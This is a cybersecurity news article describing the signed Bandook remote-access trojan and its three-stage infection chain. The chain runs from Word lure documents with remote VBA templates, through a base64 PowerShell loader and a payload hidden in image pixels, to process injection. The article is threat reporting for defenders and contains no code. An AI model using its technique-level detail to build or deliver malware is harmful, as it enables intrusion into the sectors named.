Thursday, March 28, 2024

Signed Bandook Malware Attacks Against Multiple Industrial Sectors

Like a phoenix rises from the ashes, Bandook has risen after several years. Bandook, written in both Delphi and C++ was first seen in 2007 as a commercially available RAT, developed by a Lebanese individual named PrinceAli.

Over the years, variants of Bandook were leaked on the Web, and the malware became available for public download.

Bandook was last featured in the campaigns, Operation Manul in 2015 and Dark Caracal in 2017. During the past year, dozens of digitally signed variants of the erstwhile famous Bandook began to reappear in the threat landscape.

Government, financial, energy, food industry, healthcare, education, IT and legal institutions are the targeted sectors.

Singapore, Cyprus, Chile, Italy, USA, Turkey, Switzerland, Indonesia and Germany. Not tourist locations, but the targeted countries.

Considering that a wide array of sectors and countries have been targeted, it is suspected that the malware is not developed by a single entity but by an offensive infrastructure and is being sold to governments and threat actors world-wide.

Stages of Infection

The malware chain can be described in about 3 stages as described in the below picture:

Infection Chain

Stage 1 – Lure Documents

The targeted Microsoft Word document is consists of an encrypted malicious script data and an external template that points to a document containing malicious VBA macros.

This external template is downloaded via a URL shortening web service and it redirects to another domain which is controlled by the attacker, wherein the VBA code runs automatically, decrypts the embedded data from the original lure document, and drops the decoded data into two files in the local user folder: fmx.ps1 and sdmc.jpg 

Sample document file names:

  • Malaysia Shipment.docx
  • Jakarta Shipment.docx
  • malta containers.docx
  • Certified documents.docx
  • Notarized Documents.docx
  • bank statement.docx
  • passport and documents.docx
  • Case Draft.docx
  • documents scan.docx

Stage 2 – Powershell Loader

After the 1st stage, the fmx.ps1 and sdmc.jpg calls in fmx.ps1 which is a short PowerShell script that decodes and executes a base64 encoded PowerShell stored in sdmc.jpg.

Now, the decoded PowerShell script downloads a zip file containing four files from a cloud service such as Dropbox, Bitbucket or an S3 bucket. The zip file is stored in the user’s Public folder, and the four files are locally extracted.

The 3 files a.png, b.png and untitled.png generates the malware payload. untitled.png file is actually a valid image which contains a hidden RC4 function encoded in the RGB values of the pixels, created using a known tool named invoke-PSImage.

Finally, the PowerShell script executes the malware, opens draft.docx, and deletes all previous artifacts from the Public folder.

draft.docx is a benign document that convinces the victim that the document is no longer available and that the overall execution was successful.

The document as seen post infection:

Stage 3 – Bandook Loader

The final payload is a variant of Bandook which starts with a loader to create a new instance of an Internet Explorer process and inject a malicious payload into it. The payload contacts the C&C sever, sends basic information about the infected machine, and waits for additional commands from the server. It is also found that valid Certum certificates were used to sign the Bandook malware executable.

There are three variants that are currently available:

  1. A full-fledged version with 120 commands (not signed)
  2. A full-fledged version(single sample) with 120 commands (signed)
  3. A slimmed-down version with 11 commands ( signed)

This indicates the operators desire to reduce the malware’s footprint and minimize their chances of an undetected campaign against high profile targets, whereas the use of the un-signed 120 command version can be used for low profile targets.

All evidence points to our belief that the mysterious operators behind the malicious infrastructure of “Operation Manul” and “Dark Caracal” are still alive and operational, willing to assist in the offensive cyber operations to anyone who is willing to pay. It is good to take the necessary steps to prevent this at the very first stages.

Website

Latest articles

Wireshark 4.2.4 Released: What’s New!

Wireshark stands as the undisputed leader, offering unparalleled tools for troubleshooting, analysis, development, and...

Zoom Unveils AI-Powered All-In-One AI Work Workplace

Zoom has taken a monumental leap forward by introducing Zoom Workplace, an all-encompassing AI-powered...

iPhone Users Beware! Darcula Phishing Service Attacking Via iMessage

Phishing allows hackers to exploit human vulnerabilities and trick users into revealing sensitive information...

2 Chrome Zero-Days Exploited at Pwn2Own 2024: Patch Now

Google has announced a crucial update to its Chrome browser, addressing several vulnerabilities, including...

The Moon Malware Hacked 6,000 ASUS Routers in 72hours to Use for Proxy

Black Lotus Labs discovered a multi-year campaign by TheMoon malware targeting vulnerable routers and...

Hackers Actively Exploiting Ray AI Framework Flaw to Hack Thousands of Servers

A critical vulnerability in Ray, an open-source AI framework that is widely utilized across...
Guru baran
Guru baranhttps://gbhackers.com
Gurubaran is a co-founder of Cyber Security News and GBHackers On Security. He has 10+ years of experience as a Security Consultant, Editor, and Analyst in cybersecurity, technology, and communications.

Mitigating Vulnerability Types & 0-day Threats

Mitigating Vulnerability & 0-day Threats

Alert Fatigue that helps no one as security teams need to triage 100s of vulnerabilities.

  • The problem of vulnerability fatigue today
  • Difference between CVSS-specific vulnerability vs risk-based vulnerability
  • Evaluating vulnerabilities based on the business impact/risk
  • Automation to reduce alert fatigue and enhance security posture significantly

Related Articles